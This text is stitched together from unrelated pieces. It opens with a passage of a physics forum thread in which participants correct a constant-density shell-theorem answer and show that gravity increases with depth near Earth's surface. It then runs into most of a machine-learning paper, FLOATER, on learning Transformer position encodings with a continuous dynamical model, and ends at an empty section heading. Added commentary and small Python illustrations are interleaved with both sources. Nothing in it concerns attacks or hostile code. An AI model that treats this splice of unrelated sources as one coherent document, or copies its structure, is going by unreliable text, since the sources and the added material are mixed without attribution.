earth could be added or subtracted millions of times over without any detectable difference to our most precise measurements. Last edited by a moderator: May 4, 2017 11. Sep 29, 2009 ### DaveC426913 Yes. What you want to explore is called Newton's Shell theorem. Let's simplify the setup. Pretend the Earth is a perfect sphere, 4,000,000 metres in radius. Four examples: a] Standing on its surface (0 metres depth), you will feel the full effect of a 4,000,000 metre radius sphere under you.
b] In a small hole 2 metres below the surface of the Earth, you would feel the effect of a perfect sphere 3,999,998 metres in radius. You would feel no net gravitational pull from the 2 metre thick spherical shell that constitutes the entire surface layer of the Earth. c] In a small hole 1,000,000 metres below the surface of the Earth, you would feel the effect of a perfect sphere 3,000,000 metres in radius. You would feel no net gravitational effect from the 1,000,000 metre thick spherical shell that constitutes the upper layers of the Earth. d] In a small hole 3,999,998 metres below the surface (only 2 metres from the centre), you would feel the g-pull of a sphere only 2 metres in radius. You would feel no net gravitational effect from the 3,999,998 metre spherical shell above you. Last edited: Sep 29, 2009 12. Sep 29, 2009 ### D H Staff Emeritus No! DaveC, you implicitly assumed the Earth is of a constant density throughout. This absolutely is not the case for the Earth. The Earth's core is far denser than the material above it. This simplifying assumption leads to exactly the wrong answer for this specific yes/no question. A much better approach is to assume a radial mass distribution. I don't have time to go through the derivation now. I will do so later this evening if someone else hasn't already filled in the gaps. The bottom line is that gravitational acceleration will decrease with depth if $$\rho_s > \frac 2 3 \,\bar{\rho}$$ In English, the condition for gravitational acceleration to decrease with depth is that the density of the surface material must be more than 2/3 of the mean density of the Earth. The mean density of the Earth is 5515 kg/m3. 2/3 of this is 3677 kg/m3. Dirt varies in density from about 1200 to 2000 kg/m3, far less than the requisite 3677 kg/m3. Solid granite has a density of 2691 kg/m3, so gravitational acceleration will increase with depth even if you dig through solid granite. 13. 
Sep 29, 2009 ### mgb_phys This is even used practically. Searching for oil, you measure the force of gravity on a weight; when you are over a buried oil reserve, the force will be slightly less (because oil is less dense than rock). When you are building a telescope you also have to be careful about the difference between level as measured by a spirit level or plumb bob and straight up to the stars. Local gravity might be pulled off slightly to one side because of a nearby mountain or denser rock - like your pile of dirt - affecting the spirit level. 14. Sep 29, 2009 ### DaveC426913 Yes. I should have made it explicit. The poster wants to understand the principles involved. I see no reason to complicate the principles with messy reality, at least until the poster understands the principles. But if you do want to be picky about reality, it's still perfectly true. It is still Newton's Shell Theorem. It's just that you need to factor in the varying density. Additionally, the poster's hole is only a few metres deep. While your factoring of the varying density will indeed change the numerical answer (which was not asked for), it will not change the principle of the answer. The person in the hole will still weigh less than the person standing above the hole. So, really, I'm not sure where you're coming from. 15. Sep 29, 2009 ### Staff: Mentor That is just the point, the person in the hole will weigh more, not less. There are two competing factors here: the person is closer to the center of the earth, which tends to increase the gravitational attraction, and there is a smaller amount of matter in the sphere below the person, which tends to decrease the gravitational attraction. If the density of the outer shell is less than 2/3 the average density in the sphere below (as is the case on the surface of the earth) then the closer distance effect wins and the gravity increases. Last edited: Sep 29, 2009 16.
Sep 29, 2009 ### KingNothing We like to think of things as point masses when it comes to gravity. However, in reality, one could imagine the gravitational force of each individual atom as being a separate force. 17. Sep 29, 2009 ### D H Staff Emeritus Where I am coming from is that you are wrong. The person will weigh more at the bottom of the hole. You are right that the shell theorem still applies. Ignoring the rotation of the Earth and assuming the Earth has a spherical mass distribution (density depends only on distance from the center of the Earth), the gravitational acceleration experienced at some distance r from the center of the Earth is exactly that given by Newton's law of gravitation, $$a(r) = \frac {Gm(r)}{r^2}$$ where m(r) is the mass of that portion of the Earth inside a sphere of radius r centered at the center of the Earth. Suppose the Earth comprises an inner shell of mass surrounded by an outer shell. The inner shell has spherical mass distribution, mass m0, and radius r0. The outer shell is a spherical shell of constant density ρs. The mass of the part of the Earth within a sphere of radius r, Re>r>r0 is $$m(r) = m_0 + \frac 4 3 \pi \rho_s \left(r^3-r_0^{\,3}\right)$$ Denote the difference between the mass of the inner shell and a mass of the same volume but the density of the outer shell as Δm, $$\Delta m \equiv m_0 - \frac 4 3 \pi \rho_s r_0^{\,3}$$ With this, the mass m(r) becomes $$m(r) = \frac 4 3 \pi \rho_s r^3 + \Delta m$$ The gravitational acceleration at some point r within this outer shell is thus $$a(r) = \frac {Gm(r)}{r^2} = \frac 4 3 \pi G \rho_s r + \frac {G\Delta m}{r^2}$$ The gravitational acceleration will decrease/increase with depth if the derivative of the acceleration with respect to r is positive/negative. 
Differentiating, $$\frac{\partial a(r)}{\partial r} = \frac 4 3 \pi G \rho_s - 2 \frac {G\Delta m}{r^3}$$ The condition for a decrease in gravitational acceleration with respect to depth is $$\rho_s > 2\,\frac {\Delta m}{4/3\,\pi r^3}$$ Substituting $\Delta m = m(r) - \frac 4 3 \pi \rho_s r^3$ and simplifying, $$\rho_s > 2\,\frac {m(r)}{4/3\,\pi r^3} - 2 \rho_s$$ The quantity $m(r)/(4/3\,\pi r^3)$ appearing on the right hand side is the mean density of that portion of the Earth inside a sphere of radius r. With this, $$\rho_s > \frac 2 3 \bar{\rho}$$ Two thirds of the mean density of the Earth is significantly greater than the density of granite (2.7 grams/cc) or even basalt (3.0 grams/cc). Gravitational acceleration increases with depth near the surface of the Earth. In fact, gravitational acceleration increases all the way down to the mantle/crust boundary. It then decreases a bit with increasing depth but then starts increasing again, reaching a maximum at the mantle/outer core boundary. The gravitational acceleration at the mantle/outer core boundary, 2,890 km below the surface, is greater than the gravitational acceleration at the Earth's surface. 18. Sep 29, 2009 ### DaveC426913 Got it. Conceded.
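D H's criterion is easy to check numerically with the densities quoted in the thread; a small Python sketch:

```python
def g_trend_with_depth(rho_surface, rho_mean):
    """Sign of the near-surface gravity gradient per the derivation above:
    g decreases with depth iff rho_surface > (2/3) * rho_mean."""
    return "decreases" if rho_surface > (2.0 / 3.0) * rho_mean else "increases"

RHO_MEAN_EARTH = 5515.0  # mean density of the Earth, kg/m^3

print(g_trend_with_depth(2691.0, RHO_MEAN_EARTH))  # granite surface: "increases"
print(g_trend_with_depth(4000.0, RHO_MEAN_EARTH))  # hypothetical denser crust: "decreases"
```

With granite at 2691 kg/m³, well below the 2/3 threshold of about 3677 kg/m³, gravity does indeed increase as you dig down, matching the conclusion of the thread.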
https://deepai.org/publication/learning-to-encode-position-for-transformer-with-continuous-dynamical-model
# Learning to Encode Position for Transformer with Continuous Dynamical Model

We introduce a new way of learning to encode position information for non-recurrent models, such as Transformer models. Unlike RNN and LSTM, which contain an inductive bias by loading the input tokens sequentially, non-recurrent models are less sensitive to position. The main reason is that position information among input units is not inherently encoded, i.e., the models are permutation equivalent; this problem justifies why all of the existing models are accompanied by a sinusoidal encoding/embedding layer at the input. However, this solution has clear limitations: the sinusoidal encoding is not flexible enough, as it is manually designed and does not contain any learnable parameters, whereas the position embedding restricts the maximum length of input sequences. It is thus desirable to design a new position layer that contains learnable parameters to adjust to different datasets and different architectures. At the same time, we would also like the encodings to extrapolate in accordance with the variable length of inputs. In our proposed solution, we borrow from the recent Neural ODE approach, which may be viewed as a versatile continuous version of a ResNet. This model is capable of modeling many kinds of dynamical systems. We model the evolution of the encoded results along the position index by such a dynamical system, thereby overcoming the above limitations of existing methods. We evaluate our new position layers on a variety of neural machine translation and language understanding tasks; the experimental results show consistent improvements over the baselines.
## 1 Introduction

Transformer based models [20, 4, 22, 14, 7, 15] have become one of the most effective approaches to model sequence data of variable lengths. Transformers have shown wide applicability to many natural language processing (NLP) tasks such as language modeling [14], neural machine translation (NMT) [20], and language understanding [4]. Unlike traditional recurrent models (e.g., RNN or LSTM), the Transformer uses a non-recurrent but self-attentive neural architecture to model the dependency among elements at different positions in the sequence, which leads to better parallelization on modern hardware and alleviates the vanishing/exploding gradient problem of traditional recurrent models. [23] prove that the design of the self-attentive architecture leads to a family of permutation equivalent functions. Thus, for applications where the ordering of the elements matters, how to properly encode position information is crucial for Transformer based models. There have been many attempts to encode position information for the Transformer.
In the original Transformer paper [20], a family of pre-defined sinusoidal functions was adopted to construct a set of embeddings for each position. These fixed position embeddings are then added to the word embeddings of the input sequence accordingly. To construct these position embeddings in a more data-driven way, many recent Transformer variants such as [4, 9] include these embeddings as learnable model parameters in the training stage. This data-driven approach comes at the cost of a fixed maximum input length $L_{\max}$ and the computational/memory overhead of $L_{\max} \times d$ additional parameters, where $L_{\max}$ is usually set to 512 in many applications and $d$ is the dimension of the embeddings. [18] propose a relative position representation that reduces the number of parameters by dropping the interactions between tokens with a distance greater than a clipping threshold. In addition to just the input layer, [3] and [7] suggest that the injection of position information into every layer leads to even better performance for the Transformer.

An ideal position encoding approach should satisfy the following three properties:

1. Inductive: the ability to handle sequences longer than any sequence seen at training time.
2. Data-Driven: the position encoding should be learnable from the data.
3. Parameter Efficient: the number of trainable parameters introduced by the encoding should be limited to avoid an increased model size, which could hurt generalization.

In Table 1, we summarize some of the existing position encoding approaches in terms of these three properties. In this paper, we propose a new method to encode position with minimum cost. The main idea is to model position encoding as a continuous dynamical system, so we only need to learn the system dynamics instead of learning the embeddings for each position independently.
By doing so, our method enjoys the best of both worlds – we bring back the inductive bias, and the encoding method is freely trainable while being parameter efficient. To enable training of this dynamical system with backpropagation, we adopt the recent progress in continuous neural networks [1], officially called Neural ODE. In some generative modeling literature, it is also called the free-form flow model [5], so we call our model FLOw-bAsed TransformER (FLOATER). We highlight our contributions as follows:

• We propose FLOATER, a new position encoder for the Transformer, which models the position information via a continuous dynamical model in a data-driven and parameter-efficient manner.
• Due to the use of a continuous dynamical model, FLOATER can handle sequences of any length. This property makes inference more flexible.
• With careful design, our position encoder is compatible with the original Transformer; i.e., the original Transformer can be regarded as a special case of our proposed position encoding approach. As a result, we are not only able to train a Transformer model with FLOATER from scratch, but can also plug FLOATER into most existing pre-trained Transformer models such as BERT, RoBERTa, etc.
• We demonstrate that FLOATER achieves consistent improvements over baseline models across a variety of NLP tasks, ranging from machine translation to language understanding and question answering.

## 2 Background and Related Work

### 2.1 Importance of Position Encoding for Transformer

We use a simplified self-attentive sequence encoder to illustrate the importance of position encoding in the Transformer. Without position encoding, the Transformer architecture can be viewed as a stack of $N$ blocks, each containing a self-attentive layer and a feed-forward layer. By dropping the residual connections and layer normalization, the architecture of a simplified Transformer encoder can be represented as follows.
$$\mathrm{Encode}(x) = B_N \circ B_{N-1} \circ \cdots \circ B_1(x), \qquad (1)$$
$$B_n(x) = F_n \circ A_n(x), \qquad (2)$$

where $x \in \mathbb{R}^{L \times d}$, $L$ is the length of the sequence and $d$ is the dimension of the word embedding. $A_n$ and $F_n$ are the self-attentive and feed-forward layers in the $n$-th block $B_n$, respectively. Each row of $A_1(x)$ can be regarded as a weighted sum of the value matrix $V$, with the weights determined by similarity scores between the key matrix $K$ and query matrix $Q$ as follows:

$$A_1(x) = \mathrm{Softmax}\!\left(\frac{Q K^\top}{\sqrt{d}}\right) V, \qquad (3)$$
$$Q = [q_1, q_2, \dots, q_L]^\top,\; q_i = W_q x_i + b_q, \quad K = [k_1, k_2, \dots, k_L]^\top,\; k_i = W_k x_i + b_k, \quad V = [v_1, v_2, \dots, v_L]^\top,\; v_i = W_v x_i + b_v,$$

where $W_{\{q,k,v\}}$ and $b_{\{q,k,v\}}$ are the weight and bias parameters introduced in the self-attentive function $A_1$. The output of the feed-forward function $F_1$ used in the Transformer is also a matrix with $L$ rows. In particular, the $i$-th row is obtained as follows:

$$\text{the } i\text{-th row of } F_1(x) = W_2\, \sigma(W_1 x_i + b_1) + b_2, \qquad (4)$$

where $W_{1,2}$ and $b_{1,2}$ are the weights and biases of the linear transforms, and $\sigma$ is the activation function. It is not hard to see from (3) and (4) that both $A_1$ and $F_1$ are permutation equivalent. Thus, we can conclude that the entire function $\mathrm{Encode}(\cdot)$ defined in (1) is also permutation equivalent, i.e., $\mathrm{Encode}(Px) = P\,\mathrm{Encode}(x)$ for any permutation matrix $P$. This permutation equivalence property prevents the Transformer without position information from modeling sequences where the ordering of elements matters.

### 2.2 Position Encoding in Transformer

As mentioned in Section 1, there are many attempts to inject position information into self-attentive components. Most of them can be described in the following form:

$$B_n(x) = F_n \circ A_n \circ \Phi_n(x), \quad n \in \{1, \dots, N\}, \qquad (5)$$

where $\Phi_n$ is a position encoding function. [20] propose to keep $\Phi_n$ for $n \ge 2$ as the identity and inject position information only at the input block with a family of pre-defined sinusoidal functions: $\Phi_1(x) = x + p^{(1)}$, where $p^{(1)} = [p^{(1)}_1, \dots, p^{(1)}_L]^\top$ is a position embedding matrix with the $i$-th row corresponding to the $i$-th position in the input sequence. In particular, the $j$-th dimension of the $i$-th row is defined as follows:

$$p^{(1)}_i[j] = \begin{cases} \sin\!\big(i \cdot c^{\,j/d}\big) & \text{if } j \text{ is even},\\ \cos\!\big(i \cdot c^{\,(j-1)/d}\big) & \text{if } j \text{ is odd}, \end{cases} \qquad (6)$$

where $c = 10^{-4}$.
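As a concrete illustration (not code from the paper), the fixed sinusoidal table in (6) can be sketched in a few lines of NumPy; the sizes `L` and `d` below are arbitrary:

```python
import numpy as np

def sinusoidal_encoding(L, d, c=1e-4):
    """Build the L x d sinusoidal position matrix of Eq. (6):
    even dims j use sin(i * c**(j/d)); odd dims j reuse the exponent (j-1)/d with cos."""
    p = np.zeros((L, d))
    i = np.arange(L)[:, None]        # positions i = 0..L-1
    j = np.arange(0, d, 2)           # even dimensions
    angle = i * c ** (j / d)         # i * c^(j/d), c = 1e-4
    p[:, 0::2] = np.sin(angle)
    p[:, 1::2] = np.cos(angle)
    return p

P = sinusoidal_encoding(L=8, d=16)
```

Because each (sin, cos) pair lies on the unit circle, every row has squared norm $d/2$; and since the table is a pure function of $i$, it is defined for any position, which is exactly the inductive property discussed above.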
[3] and [7] observe better performance by further injecting the position information at each block, i.e.,

$$p^{(n)}_i[j] = \begin{cases} \sin\!\big(i \cdot c^{\,j/d}\big) + \sin\!\big(n \cdot c^{\,j/d}\big) & \text{if } j \text{ is even},\\ \cos\!\big(i \cdot c^{\,(j-1)/d}\big) + \cos\!\big(n \cdot c^{\,(j-1)/d}\big) & \text{if } j \text{ is odd}. \end{cases} \qquad (7)$$

Note that for the above two approaches, the position encoding functions are fixed for all applications. Although no additional parameters are introduced into the model, both approaches are inductive and can handle input sequences of variable length. Many successful variants of pre-trained Transformer models, such as BERT [4] and RoBERTa [9], include the entire embedding matrix $p^{(1)}$ in $\Phi_1$ as training parameters. As the number of training parameters needs to be fixed, the maximum length of a sequence, $L_{\max}$, is required to be determined before training. Although it lacks the inductive property, this data-driven approach is found to be effective for many NLP tasks. Note that, unlike the fixed sinusoidal position encoding, there is no attempt to inject a learnable position embedding matrix at each block of the Transformer, due to the large number of additional parameters ($N \times L_{\max} \times d$).

## 3 FLOATER: Our Proposed Position Encoder

We introduce our method in three steps. In the first step, we look at one Transformer block and describe how to learn the position representation driven by a dynamical system; in the second step, we show how to save parameters if we add position signals to every layer; lastly, we slightly change the architecture to further save trainable parameters and make FLOATER "compatible" with the original Transformer [20]. Compatibility means our model is a strict superset of the vanilla Transformer, so that it can be initialized from the Transformer.

### 3.1 Position Encoding with Dynamical Systems

Position representations in Transformer models are a sequence of vectors $\{p_i\}_{i=1}^L$ to be added to the sequence of input representations $\{x_i\}_{i=1}^L$.
Existing position encoding approaches either apply a fixed sinusoidal function to obtain $\{p_i\}$, or include them as uncorrelated learnable parameters. Both of them fail to capture the dependency or dynamics among these position representations. In this paper, we propose to use a dynamical system to model the position representations; that is, there is a "latent force" denoted by $h$ that drives the changes from $p_i$ to $p_{i+1}$. To encourage smoothness, we consider $p(t)$ as the continuous version of the discrete sequence $\{p_i\}$. In particular, our proposed continuous dynamical system is characterized as follows:

$$p(t) = p(s) + \int_s^t h(\tau, p(\tau); \theta_h)\, d\tau, \quad 0 \le s \le t < \infty, \qquad (8)$$

together with an initial vector $p(0)$, where $h$ is a neural network parameterized by $\theta_h$ that takes the previous state $p(\tau)$ as input. Notice that the domain of $t$ is $[0, \infty)$. The position sequence $\{p_i\}$ can be obtained by evaluating $p(t)$ at a series of points $0 \le t_1 < t_2 < \cdots < t_L$, i.e., $p_i = p(t_i)$. One simple strategy is to set $t_i = i \cdot \Delta$ so that the points are equidistant, where $\Delta$ is a hyperparameter. With this strategy, we are implicitly assuming the position signals evolve steadily as we go through each token in a sentence. In general, $\{t_i\}$ can be any monotonically increasing series, which allows us to extend our work to applications where the elements in the sequence are not always observed at the same interval. More discussion of this general setting is included in the Supplementary material. For the NLP applications discussed in this paper, we choose the equidistant strategy. Eq. (8) is equivalent to an ODE problem $\frac{dp(t)}{dt} = h(t, p(t); \theta_h)$, which is guaranteed to have a unique solution under mild conditions [19]. We follow the efficient approach of [1] to calculate the gradients of the overall training loss with respect to $\theta_h$, which allows us to include this parameterized dynamical position encoder in the end-to-end training of Transformer models. More details can be found in the Supplementary material.
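To make (8) concrete, here is a toy Euler-discretized unrolling with a randomly initialized two-layer MLP standing in for $h$; the sizes, step counts, and initialization below are illustrative assumptions, not the paper's configuration:

```python
import numpy as np

rng = np.random.default_rng(0)
d, hidden = 16, 32

# Tiny MLP h(tau, p; theta_h); tau enters as one extra input feature.
W1 = rng.normal(0.0, 0.1, (hidden, d + 1)); b1 = np.zeros(hidden)
W2 = rng.normal(0.0, 0.1, (d, hidden));     b2 = np.zeros(d)

def h(tau, p):
    z = np.tanh(W1 @ np.concatenate(([tau], p)) + b1)
    return W2 @ z + b2

def unroll_positions(L, delta=1.0, substeps=4):
    """Integrate p'(t) = h(t, p(t)) with Euler steps; return p_i = p(i * delta)."""
    p, t = np.zeros(d), 0.0            # initial vector p(0) = 0
    out = [p]
    dt = delta / substeps
    for _ in range(L - 1):
        for _ in range(substeps):
            p = p + dt * h(t, p)
            t += dt
        out.append(p)
    return np.stack(out)

pos = unroll_positions(L=10)           # one vector per position, any L
```

Note how the whole position sequence, of any length, is produced by the same small set of parameters $(W_1, b_1, W_2, b_2)$ — the parameter-efficiency argument in a nutshell. (The paper solves the ODE with a proper adjoint solver rather than this crude Euler scheme.)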
Our dynamical system (8) is flexible enough to admit the standard sinusoidal position encoding (6) as a special case:

$$p_{i+1}[j] - p_i[j] = \begin{cases} \sin\!\big((i+1) \cdot c^{\,j/d}\big) - \sin\!\big(i \cdot c^{\,j/d}\big) & \text{if } j \text{ is even}\\ \cos\!\big((i+1) \cdot c^{\,(j-1)/d}\big) - \cos\!\big(i \cdot c^{\,(j-1)/d}\big) & \text{if } j \text{ is odd} \end{cases} \qquad (9)$$
$$= \begin{cases} \int_i^{i+1} c^{\,j/d} \cos\!\big(\tau \cdot c^{\,j/d}\big)\, d\tau & \text{if } j \text{ is even}\\ -\int_i^{i+1} c^{\,(j-1)/d} \sin\!\big(\tau \cdot c^{\,(j-1)/d}\big)\, d\tau & \text{if } j \text{ is odd}. \end{cases}$$

This indicates that for the simple sinusoidal encoding, there exists a corresponding dynamical system which is itself a sinusoidal function.

### 3.2 Parameter Sharing among Blocks

As mentioned in Section 2, injecting position information into each block of the Transformer leads to better performance [3, 7] in some language understanding tasks. Our proposed position encoder FLOATER (8) can also be injected into each block; the idea is illustrated in Figure 1. Typically there are $N = 6$ blocks in a sequence-to-sequence Transformer and $N = 12$ or $24$ blocks in BERT. We add a superscript $(n)$ to denote the dynamics at the $n$-th block:

$$p^{(n)}(t) = p^{(n)}(s) + \int_s^t h^{(n)}\big(\tau, p^{(n)}(\tau); \theta^{(n)}_h\big)\, d\tau.$$

As we can imagine, having a different dynamical model for each block can introduce too many parameters and cause significant training overhead. Instead, we address this issue by sharing parameters across all the blocks, namely

$$\theta^{(1)}_h = \theta^{(2)}_h = \cdots = \theta^{(N)}_h. \qquad (10)$$

Note that (10) does not imply that all the $p^{(n)}(t)$ are the same, as we assign a different initial value $p^{(n)}(0)$ to each block.

### 3.3 Compatibility and Warm-start Training

In this section, we change the way position encoding is added so that FLOATER can be directly initialized from a Transformer. As an example, we use the standard Transformer model, which has a fixed sinusoidal encoding at the input block and no position encoding at deeper levels. Note that this technique can be extended to other variants of Transformers with different position encoding methods, such as an embedding matrix.
We first examine the standard Transformer model, where the query vector at block $n$ is

$$\tilde{q}^{(n)}_i = W^{(n)}_q\big(x_i + \tilde{p}^{(n)}_i\big) + b^{(n)}_q, \qquad (11)$$

where $W^{(n)}_q$ and $b^{(n)}_q$ are the parameters in (3); $\tilde{p}^{(n)}_i$ is the sinusoidal encoding; $x_i$ is the $i$-th row of $x$. Here we add a tilde sign to indicate the sinusoidal vectors. The formulas for $k^{(n)}_i$ and $v^{(n)}_i$ have a very similar form and are omitted for brevity. Now we consider the case of FLOATER, where the new position encodings $p_i$ are added:

$$q^{(n)}_i = W^{(n)}_q (x_i + p_i) + b^{(n)}_q = \underbrace{W^{(n)}_q\big(x_i + \tilde{p}^{(n)}_i\big) + b^{(n)}_q}_{\text{Eq. (11)}} + \underbrace{W^{(n)}_q\big(p_i - \tilde{p}^{(n)}_i\big)}_{\text{extra bias term depending on } i} = \tilde{q}^{(n)}_i + b^{(n)}_{q,i}. \qquad (12)$$

It is easy to see that changing the position embedding from $\tilde{p}^{(n)}_i$ to $p_i$ is equivalent to adding a position-aware bias vector $b^{(n)}_{q,i}$ to each self-attentive layer.
As a result, we can instead apply (8) to model the dynamics of $b^{(n)}_{q,i}$. In particular, we have the following dynamical system:

$$b^{(n)}_q(t) = b^{(n)}_q(0) + \int_0^t h^{(n)}\big(\tau, b^{(n)}_q(\tau); \theta_h\big)\, d\tau. \qquad (13)$$

After that, we set $b^{(n)}_{q,i} = b^{(n)}_q(t_i)$. We can see that if $h^{(n)} \equiv 0$ and $b^{(n)}_q(0) = 0$, then $b^{(n)}_{q,i} = 0$, which implies that (12) degenerates to (11). Note that (13) has the same form as (8), except that we are now modeling the bias terms in (3). We apply the same technique to $k^{(n)}_i$ and $v^{(n)}_i$. To summarize, our model has a tight connection to the original Transformer: if we set all the dynamical models to zero, meaning $h^{(n)} \equiv 0$, then our FLOATER model is equivalent to the original Transformer with the sinusoidal encoding. The same trick also works for Transformers with position embeddings such as BERT [4]. We strive to make our model compatible with the original Transformer for the following reasons. First of all, the original Transformer is faster to train, as it does not contain any recurrent computation; this is in contrast to our dynamical model (8), where the next position depends on the previous one. By leveraging the compatibility of the model architecture, we can directly initialize a FLOATER model from a pre-trained Transformer checkpoint and then fine-tune on the downstream task for a few more epochs. By doing so, we enjoy all the benefits of our FLOATER model while maintaining an acceptable training budget. Likewise, for models such as BERT or Transformer-XL, we already have well-organized checkpoints for downstream tasks out of the box. These models are costly to train from scratch, and since our goal is to examine whether our proposed position representation method can improve over the original one, we copy the weights layer by layer for the attention as well as FFN layers, and randomly initialize the dynamical model $h^{(n)}$.

## 4 Experimental Results

In this section, we perform experiments to see whether FLOATER can improve over existing position encoding approaches for a given Transformer model on various NLP tasks.
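The rewriting in (12) is a purely algebraic identity, which a tiny NumPy check confirms (random vectors and a hypothetical dimension $d = 8$; the variables are illustrative stand-ins, not learned quantities):

```python
import numpy as np

rng = np.random.default_rng(1)
d = 8
Wq = rng.normal(size=(d, d)); bq = rng.normal(size=d)
x     = rng.normal(size=d)    # token representation x_i
p_sin = rng.normal(size=d)    # stand-in for the sinusoidal encoding p~_i
p_new = rng.normal(size=d)    # stand-in for the FLOATER encoding p_i

# Query computed with the new encoding ...
q_new = Wq @ (x + p_new) + bq
# ... equals the original sinusoidal query plus a position-aware bias, as in (12).
q_tilde = Wq @ (x + p_sin) + bq
bias_i  = Wq @ (p_new - p_sin)
assert np.allclose(q_new, q_tilde + bias_i)
```

This is why warm-starting works: swapping in a learned encoding on top of a pretrained model amounts to adding per-position bias vectors, which can be initialized at zero.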
All the metrics reported in this paper are computed from a single (not ensemble) Transformer model on each evaluation task. Albeit lower than the top scores on the leaderboards, these metrics reveal a clearer signal for judging the effectiveness of the proposed position encoder. All our experiments are based on the Transformer implementations in the fairseq [11] package; implementation details can be found in the Supplementary material. Our experimental code will be made publicly available.

### 4.1 Neural Machine Translation

Neural machine translation (NMT) is the first application that demonstrated the superiority of a sequence-to-sequence Transformer model over conventional recurrent sequence models. We include the following three additive position encoders:

• Data-driven FLOATER: $p_i$ is generated by our proposed continuous dynamical model with data-driven parameters, described in (8).
• Pre-defined sinusoidal position encoder: $p_i$ is constructed by the pre-defined function described in (6), proposed by [20] and extended by [3].
• Length-fixed position embedding: $p_i$ is included as a learnable training parameter. This was first introduced by [20] and adopted in many variants of the Transformer [4, 9].

To better demonstrate the parameter efficiency brought by FLOATER, for each encoder above we also include two experimental settings: position encoding at all blocks, or only at the input block. In Table 2, we present the BLEU scores on the WMT14 En-De and En-Fr datasets with both the Transformer-base and Transformer-large models described in [20]. Among all the data/model combinations, our proposed FLOATER at all blocks outperforms the two other position encoders. We also observe that adding position encoders at all blocks yields better performance than only at the input block, with the exception of the length-fixed position embedding approach.
We suspect that this phenomenon is due to over-fitting caused by the learnable parameters introduced by that approach. In contrast, our proposed FLOATER is parameter efficient (more discussion in Section 4.3), so the performance can be improved by injecting the position encoder at all blocks of the Transformer without much additional overhead.

### 4.2 Language Understanding and Question Answering

Pretrained Transformer models such as BERT and RoBERTa have become the key to achieving state-of-the-art performance on various language understanding and question answering tasks. In this section, we evaluate the effectiveness of the proposed FLOATER on these tasks. In particular, we focus on three benchmark suites: GLUE [21], RACE [6], and SQuAD [17]. As mentioned in Section 3.3, FLOATER is carefully designed to be compatible with existing Transformer models. Thus, we can easily utilize pretrained Transformer models to warm-start a FLOATER model, which is then finetuned on these NLP tasks. In this paper, we download the pre-trained RoBERTa model from the official repository and use it as the pretrained Transformer for all the tasks discussed in this section.

GLUE benchmark. This benchmark is commonly used to evaluate the language understanding skills of NLP models. Experimental results in Table 3 show that our FLOATER model outperforms RoBERTa on most datasets, even though the only difference is the choice of positional encoding.

RACE benchmark. Similar to GLUE, the RACE benchmark is another widely used test suite for language understanding. Compared with GLUE, each item in RACE contains a significantly longer context, which we believe makes accurate position information more important. As in the GLUE benchmark, we finetune the model from the same pretrained RoBERTa checkpoint and keep the hyperparameters, such as batch size and learning rate, the same. Table 4 shows the experimental results.
We again see consistent improvements from FLOATER across all subtasks.

SQuAD benchmark. The SQuAD benchmark [17, 16] is another challenging task that evaluates the question answering skills of NLP models. In this dataset, each item contains a lengthy paragraph of facts and several questions related to the paragraph. The model needs to predict the range of characters that answers each question. In SQuAD-v2 the problem becomes more challenging, in that some questions may be unanswerable from the context. We follow the same data processing script as BERT/RoBERTa for a fair comparison; more details about the training process are described in the Supplementary material. The experimental results are presented in Table 5. As we can see, the FLOATER model beats the baseline RoBERTa model consistently across most datasets. The improvement is significant, considering that both models are finetuned from the same pretrained checkpoint.

### 4.3 More Discussions and Analysis

#### How inductive is FLOATER?

FLOATER is designed to be inductive through the data-driven dynamical model (8). To see how inductive FLOATER is compared to existing approaches, we design the following experiment. We first notice that most of the training sentences in the WMT14 En-De dataset are short. Based on that, we make a new dataset called En-De short-to-long (or S2L for brevity): this dataset takes all the short sentences as the training split and all the long sentences as the testing split. We further divide the testing split into four bins according to the source length. BLEU scores are calculated for each bin, and the results are presented in Figure 2. Our FLOATER model performs particularly well on long sentences, even though only short sentences are seen by the model during training. This empirical observation supports our conjecture that the FLOATER model is inductive: the dynamics learned from shorter sequences can be appropriately generalized to longer sequences.
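The mechanics behind this contrast can be seen directly: a learned embedding table simply has no entry beyond its training size, while any encoder defined as a function of the position index extrapolates for free. A small illustrative sketch (sizes hypothetical):

```python
import numpy as np

L_max, d = 512, 16
table = np.random.default_rng(2).normal(size=(L_max, d))   # learned embedding table

def embed_lookup(i):
    return table[i]                    # no row exists for i >= L_max

def embed_function(i, c=1e-4):
    """Sinusoidal encoding as a pure function of the position index i."""
    j = np.arange(0, d, 2)
    ang = i * c ** (j / d)             # defined for any real i
    out = np.empty(d)
    out[0::2] = np.sin(ang)
    out[1::2] = np.cos(ang)
    return out

ok_long = embed_function(10_000)       # fine: functions of i extrapolate
try:
    embed_lookup(10_000)
    lookup_extrapolates = True
except IndexError:
    lookup_extrapolates = False        # the table cannot go past L_max - 1
```

FLOATER sits in the function camp: positions are values of the learned trajectory $p(t)$, so any $t$ is admissible.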
#### Is RNN a good alternative to model the dynamics?

The recurrent neural network (RNN) is commonly used for sequential modeling, and RNNs share some commonality with our continuous dynamical model (8): computing the value at the $i$-th step relies on the result at the $(i-1)$-st step; both contain trainable parameters, allowing them to adapt to each particular task; and both can be extrapolated to any length as needed. To see whether an RNN works equally well, we model the position sequence with an RNN:

$$p_{i+1} = \mathrm{RNN}(z_i, p_i), \qquad (14)$$

where $z_i$ is the input to the RNN at index $i$. Recall that in RNN language models, $z_i$ is the word embedding or hidden feature of the $i$-th token. In our case, since we apply the RNN to learn the encodings as opposed to hidden features, sensible inputs are the scalar position value or its vectorized sinusoidal encoding. We tried both choices on the WMT14 En-De data and found that the vectorized value generally works better, though not as well as our FLOATER model. Detailed results can be found in Table 6.

#### What does each position encoding look like?

To better understand how different position encodings affect sequence modeling, in Figure 3 we visualize the position embedding matrices obtained from four different position encoding approaches for the Transformer-base backbone on the WMT14 En-De dataset. We can see that the sinusoidal encoding (3(a)) is the most structured, while the position embedding (3(b)) is quite chaotic. Our FLOATER model learns its position representation completely from data, but still exhibits some regularities (3(c)). Finally, the RNN model (3(d)) fails to extract sufficient positional information, probably due to the vanishing gradient problem. Another finding, looking at (3(b)), is that the vectors are nearly constant across different large positions (near the bottom of Figure 3(b) we see patterns of vertical lines with the same color).
This phenomenon arises because long sentences in the dataset are scarce, so the positional information learned at lower indices cannot be extrapolated to higher indices. On the contrary, the dynamical model proposed in this paper enjoys the best of both worlds – it adapts to the dataset distribution, and it is inductive enough to handle sequences longer than those in the training split.

### 4.4 Remarks on Training and Testing Efficiency

